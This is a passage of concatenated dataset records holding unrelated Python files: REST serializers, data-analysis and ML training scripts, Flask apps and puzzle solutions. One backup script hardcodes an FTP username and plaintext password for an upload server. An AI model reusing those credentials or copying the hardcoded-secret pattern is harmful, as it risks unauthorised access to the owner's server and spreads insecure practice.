__name__ == '__main__':\n main()","sub_path":"P0253_Meeting_Rooms_2.py","file_name":"P0253_Meeting_Rooms_2.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"350055809","text":"from rest_framework import serializers\nfrom .models import *\n\n\nclass DigitalProfileSerializer(serializers.HyperlinkedModelSerializer):\n id = serializers.ReadOnlyField()\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:editdigitalprofile-detail\") # CALL JOB DETAIL ROUTER\n\n class Meta:\n model = DigitalProfile\n fields = ['url', 'id', 'user', 'company_name', 'company_logo']\n\n\nclass DigitalProfileMiniSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = DigitalProfile\n fields = ['id']\n\n\nclass EditDigitalProfileSerializer(serializers.ModelSerializer):\n user = serializers.ReadOnlyField(source='user.username')\n company_name = serializers.ReadOnlyField()\n approved = serializers.ReadOnlyField()\n\n class Meta:\n model = DigitalProfile\n fields = '__all__'\n\n\nclass PersonalDetailSerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditpersonaldetail-detail\")\n\n class Meta:\n model = PersonalDetail\n fields = '__all__'\n\n\nclass SocialMediaLinksSerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditsocialmedialinks-detail\")\n\n class Meta:\n model = SocialMediaLinks\n fields = '__all__'\n\n\nclass PaymentDetailSerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditpaymentdetail-detail\")\n\n class Meta:\n model = PaymentDetail\n fields = '__all__'\n\n\nclass ServicesSerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditservices-detail\")\n\n class Meta:\n model = Services\n fields = '__all__'\n\n\nclass EcommerceSerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditecommerce-detail\")\n\n class Meta:\n model = Ecommerce\n fields = '__all__'\n\n\nclass GallerySerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditgallery-detail\")\n\n class Meta:\n model = Gallery\n fields = '__all__'\n\n\nclass ApproveDigitalProfileSerializer(serializers.HyperlinkedModelSerializer):\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:approvedigitalprofiledetail-detail\")\n company_name = serializers.ReadOnlyField()\n\n class Meta:\n model = DigitalProfile\n fields = '__all__'\n\n\nclass ApproveDigitalProfileDetailSerializer(serializers.ModelSerializer):\n user = serializers.ReadOnlyField(source='user.username')\n company_name = serializers.ReadOnlyField()\n\n class Meta:\n model = DigitalProfile\n fields = ['user', 'company_name', 'date', 'approved']\n","sub_path":"digitalprofile/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"327322807","text":"#******************************** Run notes *******************************\n# Must be run affter Build_Data_Dictionary.py to build pickle file of data.\n# Calculates the average temperature at each tree over the 30 seconds prior to the first event\n# And saves the data as a .csv file in the ../2_Data/Repeatibility_Data/ folder\n# Uses vent_info.csv to determine the ventilation profile each experiment. \n\n\nimport pandas as pd\nimport os\nimport datetime as datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\n\ndata_location = '../2_Data/'\nevents_location = '../3_Info/Events/'\n\nchannel_list = pd.read_csv('../3_Info/Channels.csv').set_index('Channel')\nchannels_grouped = channel_list.groupby('Primary_Chart')\n\nvent_info = pd.read_csv('../3_Info/Vent_Info.csv')\n\nexp_des = pd.read_csv('../3_Info/Description_of_Experiments.csv').set_index('Experiment')\n\nchannels_to_skip = {}\n\nfor exp in exp_des.index.values:\n\tchannels_to_skip[exp] = exp_des['Excluded Channels'][exp].split('|')\n\n#Read in pickle file for data\nall_exp_data = pickle.load( open( data_location + 'all_exp_data.dict', 'rb' ) )\nall_exp_events = pickle.load( open (events_location + 'all_exp_events.dict', 'rb'))\n\nprint (all_exp_events['Experiment_2_Events'])\n# -------------------------------Calculate and output Repeatibility Data-------------------------------\nrunning_comp = {}\n\noutput_location = '../2_Data/Repeatibility_Data'\n\nfor vent in vent_info.columns:\n\n\tfor exp in vent_info[vent].dropna():\n\n\t\tif vent not in running_comp:\n\t\t\trunning_comp[vent] = {}\n\n\t\tif exp not in running_comp[vent]:\n\t\t\trunning_comp[vent][exp] = pd.DataFrame()\n\n\t\tif exp == 'Experiment_1_Data':\n\t\t\tfirst_event = all_exp_events[exp[:-4] + 'Events']['Time_Seconds'].ix[1]\n\t\telse:\n\t\t\tfirst_event = all_exp_events[exp[:-4] + 'Events']['Time_Seconds'].ix[2]\n\n\t\trunning_comp[vent][exp] = all_exp_data[exp].ix[first_event-30:first_event]\t\n\nrepeatability_data = {}\n\nif not os.path.exists(output_location):\n\tos.makedirs(output_location)\n\nfor vent in vent_info.columns.values:\n\n\tif vent not in repeatability_data:\n\t\trepeatability_data[vent] = {}\n\n\tfor exp in vent_info[vent].dropna():\n\t\tprint (exp)\n\n\t\tfor channel_group in channels_grouped.groups:\n\n\t\t\tif channel_list['Type'][channels_grouped.get_group(channel_group).index.values[0]] != 'Temperature':\n\t\t\t\tcontinue\n\n\t\t\tif 'Skin' in channel_group:\n\t\t\t\tcontinue\n\n\t\t\tgroup_values = pd.DataFrame()\n\n\n\t\t\tfor channel in channels_grouped.get_group(channel_group).index.values:\n\n\t\t\t\tif channel not in running_comp[vent][exp].keys():\n\t\t\t\t\tcontinue \n\n\t\t\t\tif channel in channels_to_skip:\n\t\t\t\t\tcontinue\n\n\t\t\t\tvalue = pd.DataFrame(running_comp[vent][exp][channel])\n\n\t\t\t\tgroup_values = pd.concat([group_values, value], axis =1)\n\n\t\t\tgroup_values = group_values.mean(axis=1)\n\n\t\t\tif exp not in repeatability_data[vent]:\n\t\t\t\trepeatability_data[vent][exp] = {}\n\n\t\t\trepeatability_data[vent][exp][channel_group]=group_values.mean()\n\n\trepeatability_data_csv = pd.DataFrame.from_dict(repeatability_data[vent])\n\trepeatability_data_csv = repeatability_data_csv.reset_index()\n\trepeatability_data_csv.rename(columns={'index':'Location'}, inplace=True)\n\n\tdata_types = []\n\tfor location in repeatability_data_csv['Location']:\n\t\tif 'Temps' in location:\n\t\t\tdata_types = data_types + ['Temperature']\n\t\telif 'HF' in location:\n\t\t\tdata_types = data_types + ['Heat Flux']\n\t\telif 'Carbon' in location:\n\t\t\tdata_types = data_types + ['Carbon Monoxide']\n\t\telif 'CO2' in location:\n\t\t\tdata_types = data_types + ['Carbon Dioxide']\n\t\telif 'O2' in location:\n\t\t\tdata_types = data_types + ['Oxygen']\n\n\trepeatability_data_csv['Type'] = data_types\n\n\trepeatability_data_csv.to_csv(output_location + '/' + vent + '.csv', index=False)\n\n\tprint ('------------------' + vent + '.csv saved in ' + output_location + '------------------')\n","sub_path":"Part_II/1_Scripts/Calculate_Repeatibility_Data.py","file_name":"Calculate_Repeatibility_Data.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"229754751","text":"# Required imports\nimport json\n\nimport aurora\n\ndef handler(event, context):\n print(f\"function executed with context: {context}\")\n #print(f\"function executed with event: {event}\")\n response = aurora.simple_call_rds_data_api(\"select sName, sID, description, pic, picCounter from shows where sID=1\", parameters=None)\n response = aurora.to_python_dict(response)\n if event[\"resolve\"]== \"query.getShow\":\n response = response[0]\n elif event[\"resolve\"] == \"mutation.deleteShow\":\n response = {'sID': \"100\", 'sName': \"fake delete\", 'description': 'this is fake to test functionality'}\n\n return response\n\n\n","sub_path":"src/functions/dummyfunction_src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"386881931","text":"'''\nAPI for the agendas app\n'''\nimport tastypie.fields as fields\nfrom avatar.templatetags.avatar_tags import avatar_url\nfrom django.contrib.auth.models import User\n\nfrom knesset.agendas.models import Agenda, AgendaVote\nfrom knesset.api.resources.base import BaseResource\nfrom knesset.mks.models import Member, Party\n\n\nclass UserResource(BaseResource):\n class Meta(BaseResource.Meta):\n queryset = User.objects.all()\n include_absolute_url = True\n include_resource_uri = False\n allowed_methods = ['get']\n fields = ['username']\n\n avatar = fields.CharField()\n\n def dehydrate_avatar(self, bundle):\n return avatar_url(bundle.obj, 48)\n\n\nclass AgendaVoteResource(BaseResource):\n class Meta(BaseResource.Meta):\n queryset = AgendaVote.objects.select_related()\n allowed_methods = ['get']\n\n title = fields.CharField()\n\n def dehydrate_title(self, bundle):\n return bundle.obj.vote.title\n\n\nclass AgendaTodoResource(BaseResource):\n class Meta(BaseResource.Meta):\n allowed_methods = ['get']\n queryset = Agenda.objects.all()\n resource_name = 'agenda-todo'\n fields = ['votes_by_conrtoversy', 'votes_by_agendas']\n\n votes_by_controversy = fields.ListField()\n votes_by_agendas = fields.ListField()\n\n # TODO: Make this a parameter or setting or something\n NUM_SUGGESTIONS = 10\n\n def dehydrate_votes_by_agendas(self, bundle):\n votes = bundle.obj.get_suggested_votes_by_agendas(\n AgendaTodoResource.NUM_SUGGESTIONS)\n return self._dehydrate_votes(votes)\n\n def dehydrate_votes_by_controversy(self, bundle):\n votes = bundle.obj.get_suggested_votes_by_controversy(\n AgendaTodoResource.NUM_SUGGESTIONS)\n return self._dehydrate_votes(votes)\n\n def _dehydrate_votes(self, votes):\n def dehydrate_vote(vote):\n return dict(id=vote.id,\n url=vote.get_absolute_url(),\n title=vote.title,\n score=vote.score)\n return [dehydrate_vote(v) for v in votes]\n\n\nclass AgendaResource(BaseResource):\n ''' Agenda API '''\n\n members = fields.ListField()\n parties = fields.ListField()\n votes = fields.ListField()\n editors = fields.ListField()\n\n class Meta(BaseResource.Meta):\n queryset = Agenda.objects.filter(\n is_public=True).prefetch_related('agendavotes__vote', 'editors')\n allowed_methods = ['get']\n include_absolute_url = True\n excludes = ['is_public']\n list_fields = ['name', 'id', 'description', 'public_owner_name']\n\n def dehydrate_members(self, bundle):\n mks_values = dict(bundle.obj.get_mks_values())\n members = []\n for mk in Member.objects.filter(pk__in=mks_values.keys()).select_related('current_party'):\n # TODO: this sucks, performance wise\n current_party = mk.current_party\n members.append(dict(\n name=mk.name,\n score=mks_values[mk.id]['score'],\n rank=mks_values[mk.id]['rank'],\n volume=mks_values[mk.id]['volume'],\n absolute_url=mk.get_absolute_url(),\n party=current_party.name,\n party_url=current_party.get_absolute_url(),\n ))\n\n return members\n\n def dehydrate_parties(self, bundle):\n return [\n dict(name=x.name, score=bundle.obj.party_score(x),\n absolute_url=x.get_absolute_url())\n for x in Party.objects.prefetch_related('members')\n ]\n\n def dehydrate_votes(self, bundle):\n return [\n dict(title=v.vote.title, id=v.id, importance=v.importance,\n score=v.score, reasoning=v.reasoning)\n for v in bundle.obj.agendavotes.select_related()\n ]\n\n def dehydrate_editors(self, bundle):\n return [\n dict(absolute_url=e.get_absolute_url(), username=e.username,\n avatar=avatar_url(e, 48))\n for e in bundle.obj.editors.all()\n ]\n","sub_path":"src/knesset/agendas/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"162475689","text":"from flask import Flask, request, url_for, render_template, redirect\n\napp = Flask(__name__)\n\n@app.route('/login/')\ndef login():\n return '登录页面'\n\n@app.route('/profile/')\ndef profile():\n if request.args.get('name'):\n return '个人中心'\n else:\n return redirect(url_for('login',_external=True), code=302)\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"redirect.py","file_name":"redirect.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"473155384","text":"import copy\nimport queue\n\nP1 = [41,33,20,32,7,45,2,12,14,29,49,37,6,11,39,46,47,38,23,22,28,10,36,35,24]\nP2 = [17,4,44,9,27,18,30,42,21,26,16,48,8,15,34,50,19,43,25,1,13,31,3,5,40]\n\neasyP1 = [9,2,6,3,1]\neasyP2 = [5,8,4,7,10]\n\n# kørten den på skolens computer op til ca. 63 mia uden resultat, så man skal\n# altså tænke sig om/man kan løse den smart...\n# Hvorfor mangler 44??\n\nq1 = queue.Queue()\nq2 = queue.Queue()\n\ndef round():\n v1 = q1.get()\n v2 = q2.get()\n if(v1 > v2):\n q1.put(v1)\n q1.put(v2)\n elif(v2 > v1):\n q2.put(v2)\n q2.put(v1)\n else:\n print(\"ERROR, same value...\")\n\nfor i in range(len(P1)):\n q1.put(P1[i])\nfor i in range(len(P2)):\n q2.put(P2[i])\n\n\ndef printqueues():\n vals = []\n print(\"q1: \")\n while(not(q1.empty())):\n tmp = q1.get()\n vals.append(tmp)\n print(tmp, end = ', ')\n print()\n print(\"q2: \")\n while(not(q2.empty())):\n tmp = q2.get()\n vals.append(tmp)\n print(tmp, end = ', ')\n print()\n return vals\n\niterationnum = 0\nwhile(not(q1.empty() or q2.empty())):\n round()\n\n\nprint(\"When done:\")\nfinalvals = printqueues()\n\nres = 0\nfor i in range(len(finalvals)):\n res += (len(finalvals)-i)*finalvals[i]\n\nprint(\"som giver: \", res)\n","sub_path":"adventofcode.cpp/2020/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"487816436","text":"from fastapi.testclient import TestClient\n\nfrom app import app\n\nclient = TestClient(app)\n\n\ndef test_extract_text():\n URL = \"http://google.com\"\n response = client.get(\"/extract_text/?URL={}\".format(URL))\n print(response.json())\n\ndef test_add_site():\n URL = \"http://google.com\"\n response = client.get(\"/extract_text/?URL={}\".format(URL))\n print(response.json())\n\n\nif __name__ == \"__main__\":\n test_extract_text()\n","sub_path":"backend/TestSite.py","file_name":"TestSite.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"15292622","text":"import sys\nif sys.version_info[0]<3:\n raise Exception(\"REQUIRES PYTHON 3\")\n\nimport ftplib\nimport glob\nimport os\n#import urllib.request\nimport zipfile\nimport time\nfrom changelog import *\n\ndef versionBundle():\n \"\"\"compress ../* into a zip with a filename according to the time.\"\"\"\n foldersToIgnore=[\"versions\",\"__pycache__\"]\n def zipdir(path, zip):\n basepath=path\n for root, dirs, files in os.walk(path):\n for file in files:\n if os.path.basename(root) in foldersToIgnore:\n continue #IGNORE BACKUPS\n elif \".pyc\" in file:\n continue #IGNORE COMPILED FILES\n else:\n absPath=os.path.join(root, file)\n relPath=absPath.replace(basepath,\"\")\n zip.write(absPath,relPath)\n fname=\"Scan-A-Gator \"\n fname+=time.strftime(\"%y.%m.%d %H.%M\",time.localtime())\n if os.path.exists(\"C:/computername.txt\"):\n with open(\"C:/computername.txt\") as f:\n fname+=\" \"+f.read().strip()\n fname=\"./versions/\"+fname+\".zip\"\n if not os.path.exists('./versions/'):\n os.mkdir('./versions')\n print(\"ZIPPING TO:\",fname)\n zipf = zipfile.ZipFile(fname, 'w', zipfile.ZIP_DEFLATED)\n zipdir(os.path.abspath(\"../\"), zipf)\n zipf.close()\n print(\"DONE\")\n\ndef versionUpload():\n \"\"\"upload the most recent compressed version to the internet. \"\"\"\n fname=sorted(glob.glob(\"./versions/*.zip\"))[-1]\n print('uploading \"%s\" ...'%fname)\n username='swhardenbackup'\n password='makeBackups13!'\n session = ftplib.FTP('ftp.swharden.com',username,password)\n session.cwd(\"SAG\")\n file = open(fname,'rb')\n session.storbinary('STOR '+os.path.basename(fname), file)\n file.close()\n\n file = open('changelog.html','rb')\n session.storbinary('STOR '+'changelog.html', file)\n file.close()\n\n print(\"DONE\")\n session.quit()\n\nif __name__ == \"__main__\":\n updateCangelog()\n versionBundle()\n input(\"\\n\\npush ENTER to upload this version ...\")\n versionUpload()\n input(\"DONE\")","sub_path":"two-photon/software/linescan-analysis/scan-a-gator-3.56/distutils/SHversion.py","file_name":"SHversion.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"504106290","text":"import logging.handlers\nimport os\nimport platform\n\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom werkzeug.contrib.cache import MemcachedCache\n\napp = Flask(__name__)\nif os.environ.get(\"YOUCAI_WEB_CONFIG\"):\n app.config.from_envvar('YOUCAI_WEB_CONFIG')\nelse:\n app.config.from_pyfile(\"/data/config/youcai_contest.py\")\n\n# logger\n\nhostname = platform.node()\n\nlogger = logging.getLogger('youcai')\nlogger.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\n hostname + \" youcai [%(levelname)s] %(asctime)s %(funcName)s %(lineno)d %(message)s\")\n\nif app.config['STAGE'] == 'DEV':\n # debug handler\n rh_debug = logging.handlers.RotatingFileHandler(filename=app.config['LOG_PATH'] + 'youcai_flask_debug.log',\n maxBytes=1024 * 1024 * 1024,\n backupCount=20)\n rh_debug.setFormatter(formatter)\n rh_debug.setLevel(logging.DEBUG)\n\n # stream handler\n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n sh.setLevel(logging.DEBUG)\n\n logger.addHandler(rh_debug)\n logger.addHandler(sh)\nelse:\n # error handler\n rh_error = logging.handlers.RotatingFileHandler(filename=app.config['LOG_PATH'] + 'youcai_flask_error.log',\n maxBytes=1024 * 1024 * 1024,\n backupCount=20)\n rh_error.setFormatter(formatter)\n rh_error.setLevel(logging.ERROR)\n\n logger.addHandler(rh_error)\n\ndb = SQLAlchemy(app)\n\nmem_cache = MemcachedCache(app.config['MEMCACHE_ADDRESS'])\n\nfrom application.utils.loginHelper import ContestLoginHelper, AdminLoginHelper\n\n\ndef _contest_user_context_processor():\n return dict(current_contest_user=ContestLoginHelper._get_user())\n\n\ndef _admin_user_context_processor():\n return dict(current_admin_user=AdminLoginHelper._get_user())\n\n\napp.context_processor(_contest_user_context_processor)\napp.context_processor(_admin_user_context_processor)\n\nfrom controller.test import test\nfrom controller.index import index\nfrom controller.contest import contest\nfrom controller.ucenter import ucenter\nfrom controller.admin import admin\n\napp.register_blueprint(test)\napp.register_blueprint(index)\napp.register_blueprint(contest)\napp.register_blueprint(ucenter)\napp.register_blueprint(admin)\n","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"317895526","text":"from flask import jsonify, request, abort, session\n\nfrom . import api\nfrom .errors import ValidationError, forbidden, not_found\nfrom .. import db\nfrom ..models import User\n\n\n@api.route('/users/login', methods=['POST'])\ndef add_user():\n new_user = User.from_json(request.json)\n user = User.query.filter_by(uuid=new_user.uuid).first()\n if user is None:\n db.session.add(new_user)\n db.session.commit()\n response = jsonify({'code': 2001, 'message': 'add user success'}), 200\n else:\n user.ping()\n response = jsonify({'code': 2002, 'message': 'welcome back'}), 200\n session['uuid'] = new_user.uuid\n return response\n\n\n@api.route('/users/uuid/')\ndef get_users_info(uuid):\n if 'uuid' in session:\n user = User.query.filter_by(uuid=uuid).first()\n if user is None:\n abort(404)\n else:\n return jsonify({'code': 2001, 'message': 'success', 'users': user.to_json()}), 200\n else:\n return forbidden('you have yet not login')\n\n\n@api.route('/users/id/')\ndef get_user(id):\n if 'uuid' in session:\n user = User.query.get(id)\n if user is None:\n return not_found('not found')\n return jsonify({'code': 2001, 'message': 'success', 'users': user.to_json()}), 200\n return forbidden('you have yet not login')\n\n\n@api.route('/users/')\ndef get_users():\n if 'uuid' in session:\n user = User.query.filter_by(uuid=session['uuid']).first()\n return jsonify({'code': 2001, 'message': 'success', 'users': user.to_json()}), 200\n else:\n return forbidden(\"you have yet not login\")\n\n\n@api.route('/users/update', methods=['PUT'])\ndef update_user():\n if 'uuid' in session:\n update_data = request.json\n if update_data is None:\n raise ValidationError('request data does not have a request body')\n else:\n uuid = session['uuid']\n user = User.query.filter_by(uuid=uuid).first()\n nick_name = update_data.get('nickName')\n avatar_url = update_data.get('avatarUrl')\n if nick_name is None and avatar_url is None \\\n or nick_name == user.nick_name or avatar_url == user.avatar_url:\n return jsonify({'code': 2003, 'message': 'does not update anything'})\n if nick_name is not None and nick_name != '':\n user.reset_nickname(uuid, nickname=nick_name)\n if avatar_url is not None and avatar_url != '':\n user.reset_avatar(uuid, avatar_url=avatar_url)\n return jsonify({'code': 2004, 'message': 'update info success', 'users': user.to_json()}), 200\n else:\n return forbidden('you have yet not login')\n","sub_path":"app/api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"195875490","text":"import os\n\nimport requests\nimport re\n\n\n# 发请求\nsession = requests.session()\n\n# 获取响应并解析\nres = session.get(\"http://www.woniuxy.com/note\")\ncontent = res.text\n# print(content)\n\n# 定义匹配规则\n# regular = '= 0.95)+1 #95 가능범위 확인\n#print(\"cumsum >= 0.99\", cumsum >= 0.99)\nprint(\"d : \", d)\n\n#시각화\n# import matplotlib.pyplot as plt\n# plt.plot(cumsum)\n# plt.grid()\n# plt.show()\n\npca = PCA(n_components= d , ) #차원축소\nx2 = pca.fit_transform(x)\nprint(x2.shape)\n# d : 331\n#(70000, 331)\n\n#1.1 데이터 전처리\nx_train, x_test, y_train, y_test = train_test_split(x2, y, train_size = 0.8, random_state = 55)\nprint(x_train.shape, x_test.shape) #(56000, 154) (14000, 154)\nprint(y_train.shape, y_test.shape) #(56000,) (14000,)\nx_train, x_val, y_train, y_val=train_test_split(x_train, y_train, train_size=0.8, random_state=55)\n\n# print(x_train.max)\n# print(x_train.min)\n\n#2. 모델링\nmodel = XGBClassifier(n_job = -1, use_label_encoder= False)\n\n#3. 컴파일, 훈련\nmodel.fit(x_train, y_train)\n\n#4. 평가, 예측\nloss = model.evaluate(x_test, y_test)\nprint('loss : ', loss)\n\ny_pred = model.predict(x_test[:10])\n# print(y_pred)\nprint(y_test[:10])\nprint(np.argmax(y_test[:10], axis=-1))\n\n#DNN\n#(784, )\n# loss : [0.09116600453853607, 0.9779000282287598]\n# [7 2 1 0 4 1 4 9 5 9]\n\n#PCA 154\n# loss : [0.13378241658210754, 0.9748571515083313]\n# [9 4 5 3 8 8 8 1 6 4]\n\n#PCA 331\n","sub_path":"ml/m33_pca_mnist1_xgb.py","file_name":"m33_pca_mnist1_xgb.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"238802303","text":"#%%\nimport pandas as pd \nimport numpy as np \nimport os\nfrom sklearn.base import BaseEstimator,TransformerMixin\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestClassifier\nclass campaign_age_unknown_trans(BaseEstimator,TransformerMixin):\n def fit(self,df,y=None):\n return self\n def transform(self,df):\n df=df.replace(to_replace={\"unknown\":np.nan})\n df.loc[(df['age']<0)|(df['age']>100),'age'] = np.nan\n df['marital'] = df['marital'].replace(to_replace={\"sungle\":\"single\"})\n df.loc[(df['pdays'] ==999) & (df['poutcome'] !='nonexistent'),'pdays'] = np.nan\n q1,q3 = df['campaign'].quantile([0.25,0.75])\n lower = q1 - 3*(q3-q1)\n upper = q3 + 3*(q3-q1)\n df.loc[(df['campaign']upper),'campaign'] = np.nan\n df.set_index('previous',inplace=True)\n df['campaign'] = df['campaign'].interpolate('linear')\n df.reset_index(inplace=True)\n df = df.assign(contacts_daily=(df['campaign']/(df['pdays']+1)).values)\n df[(df['age']>=60)&(pd.isnull(df.job))]['job']='retired'\n return df\n\nclass fix_imbalance(BaseEstimator,TransformerMixin):\n def fit(self,df,y=None):\n return self \n def transform(self,df):\n self.class_priors_pos = (df['y'] == 'yes').sum()\n self.class_priors_neg = (df['y'] == 'no').sum()\n self.df_pos = df[df['y'] == 'yes']\n self.df_neg = df[df['y'] == 'no']\n self.df_pos_over = self.df_pos.sample(int(0.5*self.class_priors_neg), replace=True)\n df = pd.concat([self.df_pos_over,self.df_neg])\n return df\n\nclass encode_mix_std(BaseEstimator,TransformerMixin):\n def fit(self,df,y=None):\n return self \n def transform(self,df):\n num_list=['age','campaign','pdays','previous','emp.var.rate','cons.price.idx','cons.conf.idx','euribor3m','nr.employed','contacts_daily']\n num_group=df[num_list]\n num_imp=SimpleImputer(strategy='mean')\n num_group=num_imp.fit_transform(num_group)\n std_=StandardScaler()\n num_group=std_.fit_transform(num_group)\n df=df.drop(num_list,axis=1)\n df['y']=df['y'].replace({'yes':True,'no':False})\n encoder_columns=list(df.columns)[:-1]\n one_hot_group=df[encoder_columns]\n df=df.drop(encoder_columns,axis=1)\n imp=SimpleImputer(strategy='most_frequent')\n one_hot_group=imp.fit_transform(one_hot_group)\n one_hot=OneHotEncoder(handle_unknown='ignore')\n one_hot_group=one_hot.fit_transform(one_hot_group)\n one_hot_group=one_hot_group.toarray()\n train_label=df['y']\n total_data=np.concatenate([num_group,one_hot_group],axis=1)\n return total_data,train_label\n\n\nhandle_pipeline = Pipeline([\n ('step1', campaign_age_unknown_trans()),\n # ('step2', assign_educ_job_marital()),\n ('step2', fix_imbalance()),\n ('step3',encode_mix_std())\n ])\n\nstrat_train_set=pd.read_csv('./data/strat_train_set.csv',index_col=False)\nstrat_test_set=pd.read_csv('./data/strat_test_set.csv',index_col=False)\n\ntrain_set, train_label=handle_pipeline.fit_transform(strat_train_set)\n\n\nhandle_test_pipeline = Pipeline([\n ('step1', campaign_age_unknown_trans()),\n ('step2',encode_mix_std())\n ])\ntest_set,test_label=handle_test_pipeline.fit_transform(strat_test_set)\ny_true=test_label\n#%%\nclf = RandomForestClassifier(random_state = 42, n_jobs = -1)\nbest_clf = GridSearchCV(clf,scoring='roc_auc',cv=5,n_jobs=-1,\n param_grid={'n_estimators': [100,200,500]})\nbest_clf.fit(train_set,train_label)\nprint(\"Select best RandomForest model with n_estimators = {} with best_score={}\".format(\n best_clf.best_params_['n_estimators'],\n best_clf.best_score_))\nfor n in [1000,1500]:\n test_clf=RandomForestClassifier(random_state =42, n_jobs = -1,n_estimators=n)\n test_clf.fit(train_set,train_label)\n print(\"The avarage AUC_ROC of the best random forest from 5-fold CV on test data is\",\n roc_auc_score(y_true.tolist(),test_clf.predict(test_set).tolist()))\n#%%\nclf = LogisticRegression()\nbest_clf = GridSearchCV(clf,scoring='roc_auc',cv=5,n_jobs=-1,\n param_grid={'C': [0.001,0.01,0.1,1,10,100]})\nbest_clf.fit(train_set,train_label)\nprint(\"Select best Logistic Regression model with C = {} with best_score={}\".format(\n best_clf.best_params_['C'],\n best_clf.best_score_))\n\nfor c in [0.001,0.01,0.1,1,10,100]:\n test_clf=LogisticRegression(C=c)\n test_clf.fit(train_set,train_label)\n print(\"The avarage AUC_ROC of the best logistic regression with {} from 5-fold CV on test data is\".format(c),\n roc_auc_score(y_true.tolist(),test_clf.predict(test_set).tolist()))\n#%%\nclf=MLPClassifier(hidden_layer_sizes=(30,10),random_state=42,activation='logistic')\nbest_clf = GridSearchCV(clf,scoring='roc_auc',cv=5,n_jobs=-1,\n param_grid={'alpha': [0.02,0.05,0.07]})\nbest_clf.fit(train_set,train_label)\nprint(\"Select best neural network model with alpha = {} with best_score={}\".format(\n best_clf.best_params_['alpha'],\n best_clf.best_score_))\n#%%\nfor a in [0.05,0.08,0.1,0.12,0.5]:\n nn_clf=MLPClassifier(random_state = 42,activation='logistic',alpha=a,hidden_layer_sizes=(30,10))\n nn_clf.fit(train_set,train_label)\n print(\"The avarage AUC_ROC of the best nn and alpha={} from 5-fold CV on test data is\".format(a),\n roc_auc_score(y_true.tolist(),nn_clf.predict(test_set).tolist()))\n# %%\ntrain=pd.read_csv('./data/bank_marketing_train.csv')\ntest=pd.read_csv('./data/bank_marketing_test.csv')\n\nhandle_pipeline = Pipeline([\n ('step1', campaign_age_unknown_trans()),\n ('step2', fix_imbalance()),\n 